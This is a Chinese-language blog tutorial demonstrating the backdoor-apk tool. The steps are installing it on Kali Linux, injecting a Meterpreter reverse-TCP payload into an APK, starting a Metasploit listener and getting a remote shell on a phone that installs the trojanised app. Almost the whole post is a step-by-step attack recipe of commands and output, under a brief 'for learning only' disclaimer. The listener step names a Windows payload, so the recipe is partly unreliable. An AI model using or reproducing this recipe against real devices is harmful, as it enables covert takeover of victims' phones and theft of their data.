最新消息:

安卓后门之backdoor-apk实例演示

Kali Linux Eternal 14704浏览 0评论

文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用

backdoor-apk 从名字上我们就能知道它的用途了,没错就是用来制作 APK 后门的。这款工具使用起来非常方便,而且功能也很强大!话不多说,下面我们直接进入正题。

首先,让我们对它进行安装,在安装前我们需要先安装它的一些依赖 lib 库文件:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

20161015140524

这里询问我们,对这些安装的服务,当他们更新时不再进行询问。我们选择 Yes 即可!

20161015140919

在完成以上依赖库的安装后接着我们就可以安装 backdoor-apk 啦!

git clone https://github.com/dana-at-cp/backdoor-apk.git

20161015143414

下载完成后我们进入到其文件目录下:

cd backdoor-apk/

cd backdoor-apk/

20161015144706

在当前目录下,我们可以看到一个脚本文件。这里,我们需要提前准备一个用来绑定后门的 APK 文件。

./backdoor-apk.sh /root/secist.apk

选择 3 payload

LHOST:192.168.15.131

LPORT:4444

20161015144955

成功执行以上操作后,会生成一个绑定后门的 secist.apk 文件,默认被保存在 backdoor-apk>>original>>dist 目录下!下面我们来启动侦听:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.15.131

set lport 4444

exploit

20161015171815

同时,我将生成的带有后门的 APK 发送至我的手机,并进行安装打开!

20161015171221 20161015171244

很快我们可以看到,我已经取得了手机的 meterpreter shell

20161006094048

简单输入一个,查看系统信息的命令:

sysinfo

可以看到目标系统为 安卓6 版本,内核为 linux 3.10.49 架构为 armv7l 。

20161015165940

转载请注明:即刻安全 » 安卓后门之backdoor-apk实例演示

您必须 登录 才能发表评论!



合作伙伴